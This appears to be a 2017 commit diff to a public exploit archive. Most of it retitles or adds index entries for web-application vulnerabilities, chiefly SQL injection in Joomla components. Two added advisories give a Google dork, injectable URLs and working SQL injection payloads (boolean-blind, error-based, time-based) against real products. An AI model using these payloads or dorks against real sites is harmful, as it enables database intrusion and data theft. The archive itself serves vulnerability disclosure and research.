DB: 2017-02-14

20 new exploits

Nokia N95-8 - browser (setAttributeNode) Method Crash
Nokia N95-8 browser - 'setAttributeNode' Method Crash

Got All Media 7.0.0.3 - (t00t) Remote Denial of Service
Got All Media 7.0.0.3 - Remote Denial of Service

GeoVision Digital Video Surveillance System - (geohttpserver) DT
GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure

pHNews alpha 1 - (templates_dir) Remote Code Execution
pHNews alpha 1 - 'templates_dir' Parameter Remote Code Execution
Bloggeruniverse 2.0 Beta - 'editcomments.php id' SQL Injection
Den Dating 9.01 - 'searchmatch.php' SQL Injection
InselPhoto 1.1 - (query) SQL Injection
PHP Krazy Image Host Script 1.01 - 'viewer.php id' SQL Injection
Bloggeruniverse 2.0 Beta - 'id' Parameter SQL Injection
Den Dating 9.01 - 'txtlookgender' Parameter SQL Injection
InselPhoto 1.1 - 'query' Parameter SQL Injection
PHP Krazy Image Host Script 1.01 - 'id' Parameter SQL Injection

Vlinks 1.1.6 - 'id' SQL Injection
Vlinks 1.1.6 - 'id' Parameter SQL Injection
CmsFaethon 2.2.0 - info.php item SQL Command Injection
InselPhoto 1.1 - Persistent Cross-Site Scripting
CmsFaethon 2.2.0 - 'item' Parameter SQL Injection
InselPhoto 1.1 - Cross-Site Scripting
SAS Hotel Management System - 'myhotel_info.asp' SQL Injection
YACS CMS 8.11 - update_trailer.php Remote File Inclusion
SAS Hotel Management System - 'id' Parameter SQL Injection
YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion

pHNews Alpha 1 - 'header.php mod' SQL Injection
pHNews Alpha 1 - 'mod' Parameter SQL Injection

Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting
Novaboard 1.0.1 - Cross-Site Scripting

Joomla! Component JE Quiz - Blind SQL Injection
Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection

SAS Hotel Management System - user_login.asp SQL Injection
SAS Hotel Management System - 'notfound' Parameter SQL Injection

JE Messenger 1.0 - Arbitrary File Upload
Joomla! Component JE Messenger 1.0 - Arbitrary File Upload

Joomla! Component 'com_jeauto' - Local File Inclusion
Joomla! Component JE Auto - Local File Inclusion

vlinks 2.0.3 - 'site.php id Parameter' SQL Injection
Vlinks 2.0.3 - 'id' Parameter SQL Injection

Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion
YACS CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion

Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection
PHP Marketplace Script - SQL Injection
Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection
Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection
Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection
Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection
Joomla! Component JE Property Finder 1.6.3 - SQL Injection
Joomla! Component JE Tour 2.0 - SQL Injection
Joomla! Component JE Video Rate 1.0 - SQL Injection
Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection
Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection
Joomla! Component JE Awd Song 1.8 - SQL Injection
Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection
Joomla! Component JE Quiz 2.3 - SQL Injection
Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection
Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection
Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection
Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection
Joomla! Component JE Ticket System 1.2 - SQL Injection
Joomla! Component JE Messanger - SQL Injection

files.csv

@@ -941,10 +941,10 @@ id,file,description,date,author,platform,type,port
 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",hardware,dos,0
 8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",multiple,dos,0
 8024,platforms/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow (PoC)",2009-02-09,desi,windows,dos,0
-8051,platforms/hardware/dos/8051.html,"Nokia N95-8 - browser (setAttributeNode) Method Crash",2009-02-13,"Juan Yacubian",hardware,dos,0
+8051,platforms/hardware/dos/8051.html,"Nokia N95-8 browser - 'setAttributeNode' Method Crash",2009-02-13,"Juan Yacubian",hardware,dos,0
 8058,platforms/windows/dos/8058.pl,"TPTEST 3.1.7 - Stack Buffer Overflow (PoC)",2009-02-16,ffwd,windows,dos,0
 8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)",2009-02-18,anonymous,windows,dos,0
-8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0
+8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0
 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0
 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0
 8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)",2009-02-23,"Guido Landi",windows,dos,0
@@ -9923,7 +9923,7 @@ id,file,description,date,author,platform,type,port
 8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0
 8023,platforms/hardware/remote/8023.txt,"ZeroShell 1.0beta11 - Remote Code Execution",2009-02-09,ikki,hardware,remote,0
 8037,platforms/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,multiple,remote,0
-8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System - (geohttpserver) DT",2009-02-11,"Dejan Levaja",windows,remote,0
+8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure",2009-02-11,"Dejan Levaja",windows,remote,0
 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC)",2009-02-16,Nine:Situations:Group,windows,remote,0
 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,windows,remote,0
 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
@@ -16638,7 +16638,7 @@ id,file,description,date,author,platform,type,port
 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0
 2296,platforms/asp/webapps/2296.txt,"SimpleBlog 2.3 - 'id' SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0
 2297,platforms/php/webapps/2297.pl,"TR Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0
-2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - (templates_dir) Remote Code Execution",2006-09-04,Kacper,php,webapps,0
+2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - 'templates_dir' Parameter Remote Code Execution",2006-09-04,Kacper,php,webapps,0
 2299,platforms/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution",2006-09-04,Kacper,php,webapps,0
 2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution",2006-09-04,DarkFig,php,webapps,0
 2301,platforms/php/webapps/2301.txt,"MySpeach 3.0.2 - (my_ms[root]) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0
@@ -20729,30 +20729,30 @@ id,file,description,date,author,platform,type,port
 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0
 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0
 8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure",2009-02-11,"Mehmet Ince",php,webapps,0
-8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'editcomments.php id' SQL Injection",2009-02-11,Osirys,php,webapps,0
+8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'id' Parameter SQL Injection",2009-02-11,Osirys,php,webapps,0
-8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - 'searchmatch.php' SQL Injection",2009-02-11,nuclear,php,webapps,0
+8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - 'txtlookgender' Parameter SQL Injection",2009-02-11,nuclear,php,webapps,0
-8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0
+8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - 'query' Parameter SQL Injection",2009-02-11,Osirys,php,webapps,0
-8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'viewer.php id' SQL Injection",2009-02-12,x0r,php,webapps,0
+8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'id' Parameter SQL Injection",2009-02-12,x0r,php,webapps,0
 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0
 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0
 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0
-8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0
+8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' Parameter SQL Injection",2009-02-13,JIKO,php,webapps,0
 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-13,bd0rk,php,webapps,0
 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps,0
-8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - info.php item SQL Command Injection",2009-02-13,Osirys,php,webapps,0
+8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - 'item' Parameter SQL Injection",2009-02-13,Osirys,php,webapps,0
-8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Persistent Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0
+8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0
 8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload",2009-02-16,Sp3shial,php,webapps,0
 8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,php,webapps,0
 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - SQL Injection / Cross-Site Scripting",2009-02-16,brain[pillow],php,webapps,0
 8063,platforms/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
 8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0
-8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
+8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'id' Parameter SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
-8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
+8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0
 8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0
 8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0
-8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod' SQL Injection",2009-02-17,x0r,php,webapps,0
+8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'mod' Parameter SQL Injection",2009-02-17,x0r,php,webapps,0
 8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,php,webapps,0
 8075,platforms/php/webapps/8075.pl,"Firepack - 'admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps,0
 8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0
@@ -20795,7 +20795,7 @@ id,file,description,date,author,platform,type,port
 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0
 8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0
 8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0
-8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
+8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0
 8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0
@@ -22409,7 +22409,7 @@ id,file,description,date,author,platform,type,port
 11282,platforms/php/webapps/11282.txt,"Joomla! Component com_ccnewsletter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps,0
 11284,platforms/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,php,webapps,0
 11286,platforms/php/webapps/11286.txt,"Joomla! Component Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
-11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
+11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
 11289,platforms/php/webapps/11289.txt,"Joomla! Component com_dms 2.5.1 - SQL Injection",2010-01-30,kaMtiEz,php,webapps,0
 11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager - Local File Inclusion",2010-01-30,kaMtiEz,php,webapps,0
 11292,platforms/php/webapps/11292.txt,"Joomla! Component JE Event Calendar - SQL Injection",2010-01-30,B-HUNT3|2,php,webapps,0
@@ -23511,7 +23511,7 @@ id,file,description,date,author,platform,type,port
 13867,platforms/php/webapps/13867.txt,"E-Book Store - SQL Injection",2010-06-14,Valentin,php,webapps,0
 13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
 13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0
-13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - user_login.asp SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
+13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - 'notfound' Parameter SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
 13883,platforms/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
 13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
 13885,platforms/asp/webapps/13885.txt,"Acuity CMS 2.7.1 - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
@@ -24338,7 +24338,7 @@ id,file,description,date,author,platform,type,port
 15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",php,webapps,0
 15720,platforms/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure",2010-12-10,Sudden_death,php,webapps,0
 15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps,0
-15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0
+15719,platforms/php/webapps/15719.txt,"Joomla! Component JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0
 15721,platforms/php/webapps/15721.txt,"Joomla! Component 'com_billyportfolio' 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
 15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0
 15735,platforms/php/webapps/15735.txt,"MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Full Path Disclosure",2010-12-15,LiquidWorm,php,webapps,0
@@ -24366,7 +24366,7 @@ id,file,description,date,author,platform,type,port
 15775,platforms/php/webapps/15775.txt,"Mafia Game Script - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 - Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0
 15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",asp,webapps,0
-15779,platforms/php/webapps/15779.txt,"Joomla! Component 'com_jeauto' - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
+15779,platforms/php/webapps/15779.txt,"Joomla! Component JE Auto - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
 15781,platforms/php/webapps/15781.txt,"Inout Webmail Script - Persistent Cross-Site Scripting",2010-12-20,Sid3^effects,php,webapps,0
 15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - Local File Inclusion",2010-12-20,xer0x,php,webapps,0
 15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Authentication Bypass",2010-12-20,"Sense of Security",asp,webapps,0
@@ -25744,7 +25744,7 @@ id,file,description,date,author,platform,type,port
 20855,platforms/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0
 20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0
 20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0
-20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 - 'site.php id Parameter' SQL Injection",2012-08-27,JIKO,php,webapps,0
+20859,platforms/php/webapps/20859.txt,"Vlinks 2.0.3 - 'id' Parameter SQL Injection",2012-08-27,JIKO,php,webapps,0
 20862,platforms/php/webapps/20862.txt,"WordPress Plugin Count Per Day 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0
 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0
 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",asp,webapps,0
@@ -33470,7 +33470,7 @@ id,file,description,date,author,platform,type,port
 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET - Multiple SQL Injections",2009-12-17,bi0,asp,webapps,0
 34345,platforms/java/webapps/34345.txt,"jCore - 'search' Parameter Cross-Site Scripting",2009-12-17,loneferret,java,webapps,0
 34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Parameter Remote Command Execution",2010-07-18,"Marshall Whittaker",cgi,webapps,0
-34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion",2010-07-18,eidelweiss,php,webapps,0
+34349,platforms/php/webapps/34349.txt,"YACS CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion",2010-07-18,eidelweiss,php,webapps,0
 34350,platforms/php/webapps/34350.txt,"Sourcefabric Campsite Articles - HTML Injection",2010-07-15,D4rk357,php,webapps,0
 34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0
 34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0
@@ -37234,6 +37234,7 @@ id,file,description,date,author,platform,type,port
 41310,platforms/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps,0
 41311,platforms/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps,0
 41312,platforms/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",linux,webapps,0
+41328,platforms/php/webapps/41328.txt,"Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
 41313,platforms/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
 41314,platforms/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
 41315,platforms/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
@@ -37247,3 +37248,22 @@ id,file,description,date,author,platform,type,port
 41325,platforms/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
 41326,platforms/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
 41327,platforms/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41329,platforms/php/webapps/41329.txt,"PHP Marketplace Script - SQL Injection",2017-02-13,Th3GundY,php,webapps,0
+41330,platforms/php/webapps/41330.txt,"Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41331,platforms/php/webapps/41331.txt,"Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41332,platforms/php/webapps/41332.txt,"Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41333,platforms/php/webapps/41333.txt,"Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41334,platforms/php/webapps/41334.txt,"Joomla! Component JE Property Finder 1.6.3 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41335,platforms/php/webapps/41335.txt,"Joomla! Component JE Tour 2.0 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41336,platforms/php/webapps/41336.txt,"Joomla! Component JE Video Rate 1.0 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41337,platforms/php/webapps/41337.txt,"Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41338,platforms/php/webapps/41338.txt,"Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41339,platforms/php/webapps/41339.txt,"Joomla! Component JE Awd Song 1.8 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41340,platforms/php/webapps/41340.txt,"Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41341,platforms/php/webapps/41341.txt,"Joomla! Component JE Quiz 2.3 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41342,platforms/php/webapps/41342.txt,"Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41343,platforms/php/webapps/41343.txt,"Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41344,platforms/php/webapps/41344.txt,"Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41345,platforms/php/webapps/41345.txt,"Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41346,platforms/php/webapps/41346.txt,"Joomla! Component JE Ticket System 1.2 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
+41347,platforms/php/webapps/41347.txt,"Joomla! Component JE Messanger - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0

platforms/php/webapps/41328.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection
+# Google Dork: inurl:index.php?option=com_soccerbet
+# Date: 12.02.2017
+# Vendor Homepage: http://www.jomsoccerbet.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/sports-a-games/tips-a-betts/soccer-bet/
+# Demo: http://demo.jomsoccerbet.com/
+# Version: 4.1.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_soccerbet&view=userbethistory&userid=[SQL]
+# # # # #

platforms/php/webapps/41329.txt

@@ -0,0 +1,60 @@
+# Exploit Title :  PHP Marketplace Script - Multiple SQL Injection Vulnerabilities
+# Author 		:  Yunus YILDIRIM (Th3GundY)
+# Team 			:  CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
+# Website 		:  http://www.yunus.ninja
+# Contact 		:  yunusyildirim@protonmail.com
+
+# Vendor Homepage 	: http://www.ecommercemix.com/
+# Software Link  	: http://ecommercemix.com/php-marketplace-script/
+# Vuln. Version	  	: 3.0
+# Demo				: http://pleasureriver.com
+
+
+# # # #  DETAILS  # # # # 
+
+SQL Injections :
+
+# 1
+http://localhost/shopby/all?q=gundy
+	Parameter: q (GET)
+	    Type: boolean-based blind
+	    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
+	    Payload: q=LIEQ") OR NOT 5305=5305#
+
+	    Type: error-based
+	    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+	    Payload: q=LIEQ") AND (SELECT 7200 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7200=7200,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("SRxl"="SRxl
+
+	    Type: AND/OR time-based blind
+	    Title: MySQL >= 5.0.12 OR time-based blind (comment)
+	    Payload: q=LIEQ") OR SLEEP(5)#
+
+# 2
+http://localhost/shopby/all?p=31
+	Parameter: p (GET)
+	    Type: boolean-based blind
+	    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
+	    Payload: p=31") OR NOT 6681=6681#
+
+	    Type: error-based
+	    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
